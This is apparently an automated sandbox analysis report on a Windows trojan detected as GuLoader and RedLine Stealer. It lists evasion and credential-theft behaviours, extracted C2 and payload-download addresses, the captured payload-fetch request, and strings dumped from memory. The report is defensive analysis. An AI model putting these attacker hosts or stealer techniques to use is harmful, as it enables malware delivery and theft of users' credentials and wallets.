
Windows Analysis Report GR8jRQeRUr

Overview

General Information

Sample Name: GR8jRQeRUr (renamed file extension from none to exe)
Analysis ID: 541930
MD5: 30a35b83c44aba13ee4ea4ee11003419
SHA1: abbb71291df7529f46f8d5896f1bb60e2a4afc21
SHA256: fee1019ba9c5d5229717f864c5dc8e1b49150b0c4db83f4a2c9b36d51eb03025
Tags: 32 exe trojan

Detection

GuLoader, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Crypto Currency Wallets
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Detected TCP or UDP traffic on non-standard ports
Contains functionality to detect virtual machines (SLDT)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • GR8jRQeRUr.exe (PID: 6416 cmdline: "C:\Users\user\Desktop\GR8jRQeRUr.exe" MD5: 30A35B83C44ABA13EE4EA4EE11003419)
    • GR8jRQeRUr.exe (PID: 6312 cmdline: "C:\Users\user\Desktop\GR8jRQeRUr.exe" MD5: 30A35B83C44ABA13EE4EA4EE11003419)
  • cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": "194.26.229.202:18758", "Bot Id": "private_6"}

Threatname: GuLoader

{"Payload URL": "http://185.112.83.8/RamzersStubed.bin"}

Yara Overview

PCAP (Network Traffic)

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
0000000F.00000002.590456261.000000001E680000.00000004.00020000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp | JoeSecurity_GuLoader_2 | Yara detected GuLoader | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
15.2.GR8jRQeRUr.exe.1e490ee8.3.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
15.2.GR8jRQeRUr.exe.1e210f6e.1.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
15.2.GR8jRQeRUr.exe.1e210f6e.1.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
15.2.GR8jRQeRUr.exe.1e490000.2.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
15.2.GR8jRQeRUr.exe.1e680000.4.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 0000000F.00000002.591527825.000000001F6D7000.00000004.00000001.sdmp | Malware Configuration Extractor: RedLine {"C2 url": "194.26.229.202:18758", "Bot Id": "private_6"}
Source: 00000000.00000002.405583590.0000000002940000.00000040.00000001.sdmp | Malware Configuration Extractor: GuLoader {"Payload URL": "http://185.112.83.8/RamzersStubed.bin"}
Multi AV Scanner detection for submitted file
Source: GR8jRQeRUr.exe | Virustotal: Detection: 13%
Source: GR8jRQeRUr.exe | ReversingLabs: Detection: 15%
Source: GR8jRQeRUr.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: GR8jRQeRUr.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: _.pdb source: GR8jRQeRUr.exe, 0000000F.00000003.523823007.000000000098B000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590191064.000000001E490000.00000004.00020000.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.589866449.000000001E1D0000.00000004.00000001.sdmp
Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_00406873 FindFirstFileW,FindClose,
Source: C:\Users\user\Desktop\GR8jRQeRUr.exe | Code function: 0_2_0040290B FindFirstFileW,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.3:49798 -> 185.112.83.8:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: http://185.112.83.8/RamzersStubed.bin
Source: Joe Sandbox View | ASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
Source: Joe Sandbox View | ASN Name: HEANETIE HEANETIE
Source: global traffic | HTTP traffic detected:
    GET /RamzersStubed.bin HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    Host: 185.112.83.8
    Cache-Control: no-cache
Source: global traffic | TCP traffic: 192.168.2.3:49799 -> 194.26.229.202:18758
Source: unknown | TCP traffic detected without corresponding DNS query: 185.112.83.8
Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp | String found in binary or memory: Yl9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp | String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: GR8jRQeRUr.exe, 0000000F.00000002.587007399.00000000008F8000.00000004.00000020.sdmp | String found in binary or memory: http://185.112.83.8/RamzersStubed.bin
Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp | String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: GR8jRQeRUr.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: GR8jRQeRUr.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: GR8jRQeRUr.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: GR8jRQeRUr.exe | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: GR8jRQeRUr.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: GR8jRQeRUr.exe | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
Source: GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp | String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp | String found in binary or memory: http://forms.rea
Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp | String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp | String found in binary or memory: http://fpdownload.macromedia.com/get/shockwave/default/english/win95nt/latest/Shockwave_Installer_Sl
Source: GR8jRQeRUr.exe, 0000000F.00000002.590687359.000000001E800000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.591406164.000000001EB2D000.00000004.00000001.sdmp, GR8jRQeRUr.exe, 0000000F.00000002.590840696.000000001E8C4000.00000004.00000001.sdmp | String found in binary or memory: http://go.micros
Source: GR8jRQeRUr.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: GR8jRQeRUr.exe | String found in binary or memory: http://ocsp.digicert.com0C
Source: GR8jRQeRUr.exe | String found in binary or memory: http://ocsp.digicert.com0O
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultl
Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590485648.000000001E6B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm4
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                        Source: GR8jRQeRUr.exe, 0000000F.00000002.590543007.000000001E743000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
